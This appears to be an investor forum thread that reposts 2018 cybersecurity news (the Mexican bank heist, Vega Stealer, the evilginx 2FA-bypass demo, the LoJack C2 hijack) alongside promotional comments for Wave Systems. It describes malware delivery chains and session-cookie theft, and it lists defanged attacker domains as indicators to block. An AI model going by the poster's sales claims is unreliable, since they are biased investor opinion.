Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Check out @OnBoardSec new blog post on use cases in #trustedcomputing and how they can help you improve your system management - Twitter Trusted Computin.
http://blog.onboardsecurity.com/blog/trusted-computing-primary-use-cases?platform=hootsuite
Trusted Computing Primary Use Cases
There are four primary use cases for implementing trusted computing with a Trusted Platform Module (TPM), the cryptographic module standardized by the Trusted Computing Group. This blog will give a brief overview of those use cases, which can be combined to create more complex and powerful solutions.
HSM and Smart Card Replacement
The Public-Key Cryptography Standards (PKCS) #11 defines an API for cryptographic tokens, such as hardware security modules (HSM) and smart cards. A TPM is essentially a traditional HSM that can also emulate a smart card but adds functionality for measuring the software of a system. Applications using PKCS#11 today can use a TPM rather than a smartcard or HSM to perform the same functions, while providing additional functionality, like code measurement and remote attestation, often at a reduced cost.
Create a Transitive Trust Chain
A key part of the TPM’s trusted computing functionality is storing software measurements of the system, which is enabled by a bank of programmable configuration registers (PCRs).
During the system boot, the first program to run is an immutable “core root of trust for measurement” firmware component. It starts an unbroken chain of software measurements and security event logging. Measurements are made by hashing each block of code before it is launched, hash extending these measurements into the PCRs, and then recording these operations in the TCG Event log. These PCR values can then be used to do remote attestation, key sealing, authorization of key use, etc. These measurements assure that the system software has not been altered in any way, even protecting against rootkits and bootkits.
see link for infographic-
Enhance Performance with Sealed Keys
Many processors have cryptographic acceleration hardware (e.g. AES acceleration) that allows them to handle many cryptographic functions. But the keys are vulnerable to attacks if the system has been compromised. Key sealing allows keys protected by the TPM to be released to the main processor if the system is deemed to be healthy by verifying the system measurements.
Establish a Permanent Strong Device Identity
Public/private key pairs can be assigned to a system as a permanent ID when provisioned during manufacturing. When stored in a TPM as non-migratable keys, a “strong” identity (permanent secret) for the system is established. TPMs are required to be bound to the system, unlike its HSM counterparts. In practice, this means the TPM, which is soldered onto the system’s motherboard, can ensure that the system you are managing is an authorized part of your ecosystem.
Improve Your Overall System Management
Using the use cases above, backend servers and systems management can be designed/enhanced to fully capitalize on powerful TPM security features, including remote attestation, key/certificate provisioning, secure boot and more.
Mexico’s Banking System Sees $18M Siphoned Off in Phantom Transactions
Why Wave's cybersecurity tools aren't benefiting the banking industry and other sectors in a big way seems a bit ludicrous. Marketing the many advantages of using the TPM and Wave's software vs. a software only solution seems to be something that is lacking and causing the market to miss this great technology. With only known devices allowed on the network and the use of Wave VSC 2.0, it would seem that this situation could have been averted. imo.
https://threatpost.com/mexicos-banking-system-sees-18m-siphoned-off-in-phantom-transactions/132004/
Somewhere between $18 million to $20 million has gone missing during unauthorized interbank money transfers in Mexico’s central banking system.
Authorities are investigating the shadow transactions, but answers are thus far scarce. The affected banks and government officials are determining whether the cash drainage, reported Monday, is the work of organized criminals mounting a cyberattack – or whether it could be an insider threat or even just human error.
Mario Di Costanzo, head of Mexico’s government commission on finance, said in a press statement that “the identity and recipients of some transactions made through the SPEI have not been identified.” SPEI is the country’s SWIFT-like centralized electronic payment system.
Beyond the official line though, unnamed sources have told Reuters this week that the funds were siphoned to fraudulent accounts in a coordinated heist that involved creating hundreds of phantom wires at several institutions; on-the-ground accomplices then took out the funds in the form of cash withdrawals at “dozens” of branch offices.
Anthony James, CMO at CipherCloud, told Threatpost in an interview that signs point to a sophisticated actor at play.
“The attackers had to penetrate the network and gather authentications. It would seem they were resident in the network for some period of time and likely watched network transactions, approval authority and more,” he said.
“This is a high-end attack and requires expensive and sophisticated cyber-attacker resources,” he noted. “This sort of attack, since it takes so much time to plan and execute, was most likely funded by organized crime as a targeted and directed attack. This is a full-time business for organized crime – they have funded a relentless and continual assault on financial institutions worldwide. Money transfer is the holy grail for them with large dollar amounts – almost the perfect and completely unattributable crime.”
If the investigation sources are correct and the perpetrators had mules in employ to take care of physical withdrawals at local bank branches, an obvious set of suspects comes to mind, according to Kenneth Geers, chief research scientist at Comodo Cybersecurity.
“The attack in Mexico appears to be domestic in nature, unlike the SWIFT manipulation in Bangladesh, which we believe was carried out from North Korea,” he told Threatpost. “As money and power become digitized, Mexican crime syndicates have no choice but to invest greater resources in computer hacking.”
He added, “I think that dozens of withdrawals from branch offices means that these are physical withdrawals by people, which would be much harder for an Asian or Russian gang to achieve remotely…[and], the historic power of Mexican cartels is destined, like everything else, to evolve and shift to cybercrime.”
Vulnerabilities at the Root
Lorenza Martinez, head of operations at the central bank (Banco de Mexico, or Banxico, for short), told Bloomberg that at least five financial institutions were found in late April to have vulnerabilities stemming from third-party software that individual banks were using. Those vulnerabilities, discovered after a suspected cyberattack disrupted some transfers, would allow the compromise of those banks’ external connections to the country’s centralized electronic payment system, SPEI.
After that revelation, Banxico asked member banks to up their security game by transitioning to an in-house, encrypted system—a migration which has sent some transactions grinding to a halt for consumers, including debit card charges, e-payments and ATM withdrawals. Even though at least 20 financial institutions have migrated to the new platform, cyberattacks have been ongoing, including one on a bank just last week, Martinez said. It’s unclear whether these attacks are related to the theft of the funds.
The incident points out the weak links that persist in the global financial system.
“Cybersecurity strategies based upon protecting the perimeter through sophisticated firewalls and endpoint defense alone are insufficient,” James said in the interview. “Recent news shows us that despite such formidable defenses, cyber-attackers are succeeding at an ever-increasing rate. Part of the problem with most financial institution networks is that they consider a user, once inside the network, to be trusted. That is, you have continual and unfettered access to network resources, traffic, you can move through the network laterally, and so on.”
Banxico said that it’s helping its bank partners to beef up their security postures, and is conducting a regulatory audit on banks’ security compliance levels. It also will require frequent stress tests in the future to ensure preparedness in the face of an attack.
The central bank in a statement (PDF) on Monday said that it’s asking members to “implement additional control measures aimed at strengthening their systems of detection of irregular transfers, verify the integrity of their operations and avoid possible adverse effects on financial institutions, to the rest of the [SPEI] participants and the system as a whole.”
President Trump signs executive order to elevate the role of agency CIOs
TPMs are nearly saturating all the computers in the government and turning them on along with Wave software could provide the U.S. government with much better security than what currently exists. Having CIOs empowered could help move along the use of this long overdue and better technology. imo.
https://www.fedscoop.com/trump-executive-order-cio-power/?utm_content=71495985&utm_medium=social&utm_source=twitter
President Donald Trump has signed an executive order that will elevate the role of agency CIOs.
The order, which was signed Tuesday afternoon, will require that agency CIOs report directly to the agency head. It will also make CIOs voting members of bureau-level IT governance boards in a bid to increase their enterprise awareness, and give them increased hiring powers.
“The true answer to modernizing government technology is to build the capacity to conduct change on an ongoing basis,” Jared Kushner, senior adviser to the president and head of the White House Office of American Innovation, said in a statement. “By ensuring that agency CIOs are empowered, today’s action by President Trump is a critical step forward in building that change management capacity.”
On a press call, senior administration officials said they were inspired to make this move after meeting with private sector tech CEOs at the White House last June. When they asked how these CEOs run their large enterprise organizations, officials said, one “glaring” difference between private sector and government was the empowerment of the CIO.
“President Trump is drawing on the best practices from the private sector and empowering CIOs to lead the technology transformation at their agencies,” Kushner said. “This executive order is a critical foundation to delivering a more efficient, effective and accountable government.”
Federal CIO Suzette Kent hinted at her desire to increase agency CIO authority at an event earlier this month.
“The accountability is there, but the second part of the equation is authority, and we’re still working on that,” she said at the time. “So when I say authority, I mean things like setting the technology direction, authority to hire skills that are needed, authority to manage the budget and the opportunity to sit at the table with agency and government leadership to collaborate and contribute on how we make decisions on how we are achieving mission.”
Giving CIOs more power, and then holding them accountable to this power, is a popular idea — and on that’s been around for a while.
The 2014 Federal Information Technology Reform Act (FITARA) was designed to give agency CIOs power over, and responsibility for, agency IT spending. It also pushes agencies to ensure that the CIO reports directly to the agency secretary or deputy secretary. However, only half of the agencies subject to FITARA have managed to make this happen.
Lawmakers have repeatedly expressed frustration with this reality. “One of the things that is still frustrating,” Rep. Will Hurd said during a hearing in March, “… is CIO authorities. We can’t hold CIOs accountable if we don’t give them all the power they need.”
Will this executive order move the needle? The White House seems to think that, at the very least, it can’t hurt.
“The fact that this is a presidential action is significant,” a senior administration official said.
This malware is harvesting saved credentials in Chrome, Firefox browsers
Wave Endpoint Monitor could stop this malware or Wave VSC 2.0 could keep important login credentials from being useful to a hacker. PIM use instead of the browser for storing credentials may help as well. imo.
https://www.zdnet.com/article/this-malware-is-harvesting-saved-credentials-in-chrome-firefox-browsers/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem%3A%20Trending%20Content&utm_content=5af9e74504d30179e6588d74&utm_medium=trueAnthem&utm_source=twitter
Researchers say the new Vega Stealer malware is currently being used in a simple campaign but has the potential to go much further.
Vega Stealer malware is at the heart of a new campaign designed to harvest saved financial data from Google Chrome and Firefox browsers.
While the new malware is only being utilized in simplistic and small phishing campaigns at the moment, researchers from Proofpoint say that Vega Stealer has the potential to become a common threat to businesses in the future.
Vega Stealer is a variant of August Stealer. Written in .NET, August Stealer locates and steals credentials, sensitive documents, and cryptocurrency wallet details from infected machines.
The new malware has a subset of the same functionality but has also been upgraded with an arsenal of expanded features, including a new network communication protocol and Firefox stealing functionality.
Vega Stealer is also written in .NET and focuses on the theft of saved credentials and payment information in Google Chrome. These credentials include passwords, saved credit cards, profiles, and cookies.
When the Firefox browser is in use, the malware harvests specific files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" -- which store various passwords and keys.
However, Vega Stealer does not wrap up there. The malware also takes a screenshot of the infected machine and scans for any files on the system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for exfiltration.
According to the security researchers, the malware is currently being utilized to target businesses in marketing, advertising, public relations, retail, and manufacturing.
The phishing campaign designed to propagate the malware, however, is not sophisticated. Emails are sent with subject lines such as "Online store developer required," and while some are targeted and sent to individuals at a business, most messages are sent to distribution lists including "publicaffairs@" and "clientservice@".
The email contains an attachment called "brief.doc" in which malicious macros download the Vega Stealer payload.
The payload is retrieved in two steps. The document first downloads an obfuscated JScript/PowerShell script which, once executed, creates a second request that pulls the executable payload of Vega Stealer from the threat actor's command-and-control (C&C) center.
This payload is then saved in the victim's "Music" directory with the name "ljoyoxu.pkzip." Once the executable is in place, Vega Stealer automatically executes via the command line in order to begin harvesting information.
Proofpoint believes that the document macro and URLs involved in the campaign may point towards the same threat actor responsible for campaigns spreading financial malware. However, such attribution is made tentatively.
"The document macro utilized in this campaign is a commodity macro that we believe is for sale and used by multiple actors, including the threat actor spreading Emotet banking Trojan," the researchers say. "However, the URL patterns from which the macro retrieves the payload are the same as those used by an actor we are tracking who distributes the Ursnif banking Trojan, which often downloads secondary payloads such as Nymaim, Gootkit, or IcedID. As a result, we attribute this campaign to the same actor with medium confidence."
Proofpoint says that it remains to be seen whether or not Vega Stealer is simply a tweaked version of August Stealer developed for this specific campaign. However, the team does believe that due to the sophisticated delivery mechanism, Vega Stealer has the potential to evolve into a common threat.
How to Secure Network Equipment Against Attacks
May 16 webcast - Learn how to secure network equipment #TPM root of trust against malware, physical attacks. Protect date, devices @Infineon @Cisco #Huawei @TrustedComputin
With network devices being secured, the TPM being enabled in computers could start to have a stronger impact. Securing network equipment could be the spark for enabling TPMs in all computers in a company's computer fleet with the help of marketing. imo.
May 16 webcast - Learn how to secure network equipment #TPM root of trust against malware, physical attacks. Protect date, devices @Infineon @Cisco #Huawei @TrustedComputin https://t.co/d5hWGhJC05
— Trusted Computing (@TrustedComputin) May 11, 2018
CNI providers face hefty fines for cyber security failings
UK CNI providers should add Wave's products to their existing cybersecurity products for the most robust safeguards. imo. Wave's superior cybersecurity products could even replace some existing products. Better security at less than half the cost.
https://www.computerweekly.com/news/252440806/CNI-providers-face-hefty-fines-for-cyber-security-failings
UK providers of critical national infrastructure face hefty fines for cyber security failings from 10 May 2018
New UK laws implementing the EU directive on the security of network and information systems (NIS) goes into effect on 10 May 2018.
All organisations classified by the NIS Competent Authorities to be “operators of essential services” will be affected by new laws.
The new rules are aimed at ensuring the UK’s most critical industries boost cyber security and are backed by hefty fines for any organisation in the sector that fails to take adequate steps to protect itself from cyber attacks.
Energy, transport, water, health and other critical services firms could be fined up to £17m if they fail to have the most robust safeguards in place.
The new measures also cover other threats affecting IT, such as power outages, hardware failures and environmental hazards.
In 2017, the Department for Digital, Culture, Media and Sport (DCMS) ran a public consultation seeking views from industry on how to implement the NIS Directive.
Organisations that fall under the new rules are required to report cyber security incidents to the appointed competent authorities, who will assess whether appropriate security measures were in place.
The authorities will have the power to issue legally binding instructions to improve security and – if appropriate – impose financial penalties.
The UK’s National Cyber Security Centre (NCSC) is providing technical support and guidance to other government departments, devolved adminstrations, competent authorities and OES through a set of cyber security principles for securing essential services, a collection of supporting guidance and a Cyber Assessment Framework (CAF) incorporating indicators of good practice.
The NCSC is also providing implementation guidance and support to CAs to enable them to adapt the NIS principles for use in their sectors, undertake assessments using the CAF and interpret the results.
The NCSC will fulfil the role of a CSIRT (computer security incident response team) for the UK, as well as a single point of contact for engagement with EU partners on NIS, coordinating requests for action or information and submitting annual incident statistics, and function as the technical authority on cyber security for CAs and OES, but will have no regulatory role.
“The magnitude, frequency and impact of network and information system security incidents is increasing,” according to guidance published by the NCSC.
“Events such as the 2017 WannaCry ransomware attack, the 2016 attacks on US water utilities and the 2015 attack on Ukraine’s electricity network clearly highlight the impact that incidents can have,” the guidance said.
NIS Directive critical for essential services
Charlie Wedin, cyber security expert at international legal practice Osborne Clarke, said the NIS Directive will be critical to ensure essential services in the UK remain “on” during even the most extreme cyber attacks.
“In recent years, the number of cyber attacks against national infrastructure has risen dramatically, and this demonstrates just how attractive these systems have become to malicious actors looking to target any vulnerable points in the system.
“The consequences on society can be significant – preventing access to power, transport and emergency services. Recognising the importance of digital services in today's society, the directive also applies to online marketplaces, search engines and cloud storage.
“So, while the NIS Directive has been somewhat overshadowed by the General Data Protection Regulation, operators of essential services must ensure they are prepared to deal with both regulations,” he said.
Wedin suggests that organisations should test their security measures with realistic “war game” simulations to identify and rectify potential weaknesses proactively.
Iran likely to retaliate with cyberattacks after nuclear deal collapse
One could figure that with the potential exposure to U.S. companies from this article the support and sales lines at wavesys.com would be busy if Wave's superior cybersecurity were better advertised. I assume with those numbers publicly displayed on the site they are ready for action. imo.
https://www.zdnet.com/article/iran-poised-to-launch-cyberattacks-after-nuclear-deal-collapses/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem%3A%20Trending%20Content&utm_content=5af48c2f04d3016800de23da&utm_medium=trueAnthem&utm_source=twitter
Businesses in the US, Europe, and their allies — like Saudi Arabia and Israel — are also at risk of cyberattacks
Iran is likely to respond with cyberattacks against Western businesses in response to the Trump administration's withdrawal from the nuclear deal, cybersecurity experts say
Research out Wednesday suggests attacks could come "within months, if not faster," according to security firm Recorded Future.
The research paints a detailed picture of how Iran uses contractors and universities to staff its offensive cybersecurity operations -- or hacking efforts -- against foreign targets.
A former insider with knowledge of Iran's hacking operations said the attacks are likely to be launched by contractors and thus pose a greater risk of spinning out of control.
On Tuesday, President Donald Trump announced the US would withdraw from the Iran nuclear deal, a pact of Western nations that pledged to lift economic sanctions against Iran in exchange for limiting its nuclear program. The UN's nuclear verification agency said Iran had complied with the agreement.
Although there has been no evidence or intelligence to suggest a cyberattack is in the works, researchers say they predict, based on Iran's past cyber activities, that retaliatory cyberattacks are likely.
"We assess that within months, if not sooner, American companies in the financial, critical infrastructure, oil, and energy sectors will likely face aggressive and destructive cyberattacks by Iranian state-sponsored actors," said Priscilla Moriuchi, a former NSA analyst, now at Recorded Future.
"The Islamic Republic may utilize contractors that are less politically and ideologically reliable -- and trusted -- and as a result, could be more difficult to control," she said.
Countries allied with the US and Europe -- like Saudi Arabia and Israel -- are also at risk, the report said.
Levi Gundert, who co-authored the research, told ZDNet the attacks will likely aim for "maximum impact," such as a malware attack rather than a denial-of-service attack.
Much of the research is centered on Iran's long-known history of targeting Western businesses and governments with cyberattacks in response to sanctions, largely because of how quickly the hackers could turn around an attack.
Tehran began strengthening its cyber capabilities following the Green Revolution, a period of intense protests in Iran against the incumbent government during the Arab Spring in 2009.
The government responded with a heavy crackdown, with an increased focus on cyber operations.
Phishing Attack Bypasses Two-Factor Authentication
Some two factor authentication works better at less than half the cost.
https://www.darkreading.com/endpoint/phishing-attack-bypasses-two-factor-authentication/d/d-id/1331776
Hacker Kevin Mitnick demonstrates a phishing attack designed to abuse multi-factor authentication and take over targets' accounts.
Businesses and consumers around the world are encouraged to adopt two-factor authentication as a means of strengthening login security. But 2FA isn't ironclad: attackers are finding ways to circumvent the common best practice. In this case, they use social engineering.
A new exploit, demonstrated by KnowBe4 chief hacking officer Kevin Mitnick, lets threat actors access target accounts with a phishing attack. The tool to do this was originally developed by white hat hacker Kuba Gretzky, who dubbed it evilginx and explains it in a technical blog post.
It starts with typosquatting, a practice in which hackers create malicious URLs designed to look similar to websites people know. Mitnick starts his demo by opening a fake email from LinkedIn and points out its origin is "llnked.com" - a misspelling people will likely overlook.
Those who fall for the trick and click the email's malicious link are redirected to a login page where they enter their username, password, and eventually an authentication code sent to their mobile device. Meanwhile, the attacker can see a separate window where the victim's username, password, and a different six-digit code are displayed.
"This is not the actual 6-digit code that was intercepted, because you can't use the 6-digit code again," Mitnick says in the demo. "What we were able to do was intercept the session cookie."
With the session cookie, an attacker doesn't need a username, password, or second-factor code to access your account. They can simply enter the session key into the browser and act as you. All they have to do is paste the stolen session cookie into Developer Tools and hit Refresh.
It's not the first time 2FA has been hacked, says Stu Sjouwerman, founder and CEO at KnowBe4. "There are at least ten different ways to bypass two-factor authentication," he explains in an interview with Dark Reading. "They've been known about but they aren't necessarily well-published … most of them are flying under the radar."
These types of exploits are usually presented as concepts at conferences like Black Hat. Mitnick's demo puts code into context so people can see how it works. This can be used for any website but an attacker will need to tweak the code depending on how they want to use it.
To show how the exploit can make any site malicious, Sjouwerman sent me an email tailored to look like it came from Kelly Jackson Higgins, reporting a typo in an article of mine:
See link -
When I clicked the link, I ultimately ended up on Dark Reading but was first redirected to a site owned by the "attacker" (Sjouwerman). In a real attack scenario, I could have ended up on a truly malicious webpage where the hacker could launch several different attacks and attempt to take over my machine. Sjouwerman sent a screenshot of what he saw while this happened:
See link -
Event types go from processed, to deferred, to delivered, to opened.
"You need to be a fairly well-versed hacker to do this - to get it set up and have the code actually working," he notes. This is a one-on-one attack and can't be scaled to hit a large group of people at the same time. However, once the code works, the attack is fairly simply to pull off.
"You need to have user education and training, that's a no-brainer, but you also have to conduct simulated phishing attacks," Mitnick says in his demo.
Sjouwerman emphasizes the importance of putting employees through "new school" security awareness training, as opposed to the "death by PowerPoint" that many employees associate with this type of education. Instead of putting them through presentations, he recommends sending them phishing attacks and conducting online training in the browser.
Warren Buffett: Cybersecurity risk 'is uncharted territory. It’s going to get worse, not better'
Given that Warren Buffet knows Wave Systems as I recall, it would seem to make sense that having his cybersecurity insurance business make TPMs to be turned on 100% in a corporate fleet of computers mandatory for its customers to have its insurance. This could help stop unknown devices from getting on the network and starting a cyberattack. Wave's other products could help prevent other cyberattacks as well.
https://www.cnbc.com/2018/05/05/warren-buffett-cybersecurity-risk-is-uncharted-territory-its-going-to-get-worse-not-better.html
•Warren Buffett is concerned about the cybersecurity threat to the insurance industry.
•"Cyber is uncharted territory. It's going to get worse, not better," he said at the Berkshire Hathaway 2018 Annual Shareholders Meeting Saturday.
Warren Buffett believes cybersecurity incidents will rise, and with it the potential to significantly harm the insurance industry.
"Cyber is uncharted territory. It's going to get worse, not better," he said at the Berkshire Hathaway 2018 Annual Shareholders Meeting Saturday. "There's a very material risk which didn't exist 10 or 15 years ago and will be much more intense as the years go along."
Buffett said he doesn't want much underwriting exposure to cybersecurity threats for Berkshire's insurance businesses. He noted the company has a "pretty good idea" on how to properly assess the probabilities for earthquakes in California and hurricanes in Florida, but not with computer hacking threats.
The investor expressed skepticism that any insurance company can assess the risk for cybersecurity events.
"We don't want to be a pioneer on this ... I think anybody that tells you now they think they know in some actuarial way either what [the] general experience is like in the future, or what the worst case can be, is kidding themselves," he added.
LoJack Attack Finds False C2 Servers
EX05 looks like the go to solution after reading this article.
https://www.darkreading.com/attacks-breaches/lojack-attack-finds-false-c2-servers/d/d-id/1331691
A new attack uses compromised LoJack endpoint software to take root on enterprise networks.
Researchers have identified a new attack that uses computer-recovery tool LoJack as a vehicle for breaching a company's defenses and remaining persistent on the network. The good news is that it hasn't started specific malicious activity — yet.
Arbor Networks' ASERT, acting on a third-party tip, found a subtle hack involving legitimate LoJack endpoint agents. The threat actors didn't change any of the legitimate actions of the software. All they did was strip out the legitimate C2 (command and control) server address from the system and replace it with a C2 server of their own.
Richard Hummel, manager of threat research at NETSCOUT Arbor's ASERT, says that the subtlety of the action means that most existing security software and systems will not provide any indication that something is going wrong. "If they're running as an admin, they might not see it," Hummel says. "This doesn't identify as malicious or malware, so they might just see a subtle warning."
The addresses of the new C2 servers are pieces of the analysis that led researchers to believe that the campaign is attributable to Fancy Bear, a Russian hacking group responsible for a number of well-known exploits. On initial execution, the infected software contacts on of the C2 servers, which logs its success. Then, the new LoJack application proceeds to … wait. It simply does what LoJack does, with no additional communication or activity.
Hummel says that the lack of activity and lack of steps to prevent legitimate activity means that most security software won't recognize that the app is anything but legitimate.
Once in place, the nature of the LoJack system's activities means that it's very persistent, remaining in place and active through reboots, on/off cycles, and other disruptive events.
"This is basically giving the attacker a foothold in an agency," Hummel says. "There's no LoJack execution of files, but they could launch additional software at a later date." And the foothold that the software gains is a strong one.
"If they're on a critical system or the user is someone with high privileges, then they have a direct line into the enterprise," Hummel explains, adding, "with the permissions that LoJack requires, [the attackers] have permission to install whatever they want on the victims' machines."
There is, so far, nothing about the attack that contains a huge element of novelty. As for the code, Hummel says that this particular mechanism for attack has been around since 2014, when the software that is now LoJack was called Computrace. Even then, Hummel says, "researchers talked about how LoJack maintains its persistence."
And while Hummel's team has suspicions about infection mechanisms, they aren't yet sure what's happening. "We did some initial analysis on how the payload is being distributed and other Fancy Bear attacks, and we can't verify the infection chain," Hummel says, though he's quick to add, "We don't think that LoJack is distributing bad software."
With stealth and persistence on its side, how does an enterprise prevent this new attack from placing bad software on corporate computers? Hummel says everything begins with proper computer hygiene. "Users will be prompted for permission warnings — don't just blow by them," he says.
Next, the IT security team can scan for five domains currently used by the software:
•elaxo[.]org
•ikmtrust[.]com
•lxwo[.]org
•sysanalyticweb[.]com (2 forms)
Each of these domains should be blocked by network security mechanisms.
It's rare to have warning of an active infection method prior to damaging attacks using the infection target. Organizations now have time to learn about the tactic and disinfect compromised endpoints before the worst occurs.
The best antivirus? Kaspersky leads in latest tests, but that's only part of the story
After reading an article like this, it would seem logical that Wave Endpoint Monitor would have a good slice of the pie.
https://www.csoonline.com/article/3215866/endpoint-protection/the-best-enterprise-antivirus-kaspersky-leads-in-latest-tests.html#tk.twt_cso
Ransomware and other threats often get through signature-based antivirus protection, giving it a bad rap. However, antivirus tools still play an important role in the enterprise security strategy.
The AV-TEST Institute recently tested the most popular Windows 10 client antivirus products on three primary criteria: protection, performance, and usability. Products that ranked highest in all three areas were Kaspersky Lab Endpoint Security 10.3 and Small Office Security 5, Symantec Endpoint Protection 14.0 and Endpoint Protection Cloud 22.11, and Trend Micro Office Scan 12.
The downloadable infographic below summarizes the results. You can drill down on the full results at The AV-TEST Institute's website.
Why the best antivirus software may not be enough
Traditional signature-based antivirus is notoriously bad at stopping newer threats such as zero-day malware and ransomware, but it still has a place in the enterprise, experts say, as part of a multi-layer endpoint security protection strategy. The best antivirus products act as the first layer of defense, stopping the vast majority of malware attacks and leaving the broader endpoint protection software with a smaller load to deal with.
According to a survey of this year's Black Hat attendees, 73 percent think that traditional antivirus is irrelevant or obsolete. "The perception of the blocking or protection capabilities of antivirus has certainly declined," says Mike Spanbauer, vice president of strategy and research at NSS Labs, Inc.
Plenty of recent research supports that point of view. In December 2017, security company WatchGuard Technologies reported the results of a comprehensive test of traditional antivirus. They calculated how well a leading traditional antivirus product did at spotting zero-day threats by looking at customers who had both traditional antivirus and next-generation endpoint protection products installed. Traditional antivirus caught 9,861,318 malware variants, but it missed 3,074,534 others that were caught by a next-generation platform that used a behavior-based approach. That's a failure rate of about 24 percent.
The traditional antivirus product was from AVG Technologies, a well-reviewed product. In fact, in a report released in late 2017 by AV Comparatives, AVG caught 99.6 percent of the samples tested, making it one of the top ten products on the market.
Antivirus is particularly bad at catching ransomware, one of the biggest new threats that companies face. In a March 2017 survey of 500 organizations, anti-phishing vendor KnowBe4 found that only 52 percent of companies were able to thwart a simulated ransomware attack. For the rest, the ransomware was able to get past their antivirus defenses.
A newer threat called Process Doppelganging takes advantage of the ability of the transactions feature in Windows' NTFS file system. It allows malware to perform operations on files that make them invisible to security software. "From a technical perspective, [our] research shows that correct file scan engines are hard to get right and specifically, that correct handling of transactions is even harder," says Udi Yavo, a researcher at enSilo, which discovered Process Doppelganging.
"However, I think the main takeaway of this research is that having a single line of defense is not enough, and sometimes even small tricks can lead to bypasses, even in mature products. Enterprises should move to solutions that can block fileless attacks and are effective in both pre- and post-execution scenarios,” says Yavo.
NSS Labs has also been running tests of both traditional and next-generation endpoint protection tools. In its latest rounds of testing the company has focused only on vendors that have advanced detection capabilities. Last year, when testing included signature-only vendors as well, the traditional products did poorly. "A number of products scored in the 90s," says NSS Lab's Spanbauer, "But none of those were sole traditional antivirus."
The problem is compounded if the new threats are designed to spread quickly in a company and do as much damage as fast as possible, and compounded again if enterprises delay rolling out antivirus updates. In addition, the amount of malware is growing exponentially, according to AV-Test, so even if a particular product has a high detection rate, more and more malware in absolute terms is going to slip through. Plus, if the attackers notice that a particular kind of malware is getting through, they can double-down on it.
These four factors combined have helped propel the recent WannaCry ransomware to more than 400,000 infected devices and potential total financial impact of as much as $8 billion. That doesn't mean that traditional antivirus is completely obsolete. It still has a place in the enterprise, experts say, because it is very effective at spotting and blocking known threats quickly, efficiently and with minimum human intervention. Plus, traditional antivirus is a compliance or customer requirement in some industries.
The case for traditional antivirus
One company that doesn't have a choice about whether to use traditional antivirus is Emeryville, Calif.-based National Mortgage Insurance Corp. "Our customers are banks, and many require a traditional signature-based antivirus as part of the defense we have in place," says Bob Vail, the company's director of information security.
Sophos, the company’s antivirus vendor, has a good detection record, and is very light-weight, he says. That makes it a good first round of defense, but Vail says he knows that's not enough. "antivirus in general is going to be after-the-fact," he says. "Someone has to be infected and a signature developed and hopefuly everyone else gets protected before they get attacked."
The company also has a second level of protection in place to guard against the malware that gets through, a behavior-based system from enSilo. The two products work well together, Vail says. "If a known virus comes down, Sophos will quarantine the file before it gets a chance to execute," he says. "But those things that get past it, enSilo will prosecute those, so it's a classic defense at depth."
Traditional antivirus is a good adjunct to the newer technologies such as those that involve behavior analytics, sandboxing, and machine learning. The more advanced tools can require more processing power, which can slow down computers. If the product runs behavioral or other tests on potential threats before permitting user access, it can impact productivity. If the product allows the threats through, then tests them separately, malware has a window of opportunity to get access to enterprise systems.
Finally, when a new threat is detected, additional work is required to mitigate the threat and generate signatures to protect against the threat in the future. "The first level of defense will always be some kind of signature-based defense," says Raja Patel, VP for corporate product at McAfee LLC. "If you already know something is bad, why do an additional layer of protection against it?"
Without that initial signature-based screening, companies will have to spent a lot more time, effort and money to handle all the threats that come in, he says. "You can image how much a security team would have to put up with." If a threat can be caught and stopped right out of the gate, it's the cheapest option. "Signature-based antivirus saves human effort and reduces false positives and time delays," he says. "It's a fantastic first layer, and will be for a long time."
Traditional, next-gen tools are converging
As the industry matures, enterprises are going to be able to get the full-suite of malware protection tools from a single vendor, if they don't already. Traditional antivirus providers are adding next-gen capabilities, while the next-generation vendors are including signature-based protections in their suites.
Endpoint security startup CrowdStrike, for example, launched its all-in-one Falcon platform three years ago, allowing customers such as the Center for Strategic and International Studies, a Washington, DC, think tank, to get everything in one place. "We had CrowdStrike already in place and were relying on it as part of endpoint security," says Ian Gottesman, the organization's CIO. "Extending that solution to include antivirus was advantageous for CSIS. I would recommend any other organizations do the same."
According to a survey released in 2017 by the SANS Institute, about 95 percent of respondents expect to see antivirus protection included in their next-generation endpoint solution. Traditional antivirus vendors aren't sitting on the sidelines, either.
Instead, many are buying or building the next-generation tools that can help catch the attacks that get by signature-based defenses. "antivirus will become extinct in the next few year unless they are able to evolve," says Luis Corrons, PandaLabs technical director at Panda Security, a traditional antivirus vendor. "We at Panda have been fully aware of this."
The company has been behavioral-based malware detection for several years, but even that is not enough. Many successful security breaches involve no malicious software at all, he says. "To say it crystal clear, a traditional antivirus is useless against these attacks as there is no malware involved," he says. For example, attackers can take advantage of existing non-malicious software.
The company has recently rolled out new tools to monitor the behavior of all active applications in an enterprise. "It allows us to have full visibility of what is happening in our network," he says.
McAfee has also added on new layers of protection, says McAfee's Patel. "Signature-based defenses will protect you after you know about the threats, but they won't protect patient zero and the time period after infection and when you wrote the signatures," he says. "We added two new protection capabilities last year -- machine learning and dynamic application containment."
Why some companies still rely on traditional antivirus alone
Ransomware infection rates show that many companies still lack adequate endpoint protection. According to an IBM survey, nearly half of all companies fell victim to ransomware in 2016, with 70 percent of them deciding to pay the ransom.
Small firms are also hit, and, unlike the largest enterprise, may not be taking endpoint protection as seriously. A 2017 survey by the Ponemon Institute showed that 51 percent of small and medium-sized businesses have experienced a ransomware attack, but, despite that, 57 percent says that they were "too small" to be targets for ransomware.
According to a May 2017 report by endpoint protection vendor VIPRE Security, 48 percent of IT managers and small and medium-sized enterprises says that a company of their size doesn't need endpoint security with advanced malware defense capabilities.
That's a mistake, says NSS Labs' Spanbauer. There are so many good options available on the market today, and very competitive pricing, that no company should be using signature-based antivirus and nothing else, he says. "There is not a price or protection argument that can be made that would make traditional antivirus the first choice or the preferred recommendation for any specific environment." More comprehensive protection is easier to find than ever before, with even entry-level products offering advanced controls, he adds. "It's hard to find a strict signature-only antivirus product these days."
PDF Files Can Be Abused to Steal Windows Credentials
Wave VSC 2.0 could be a good preventative measure in that the second factor makes the credentials essentially worthless to a hacker. imo.
https://www.bleepingcomputer.com/news/security/pdf-files-can-be-abused-to-steal-windows-credentials/
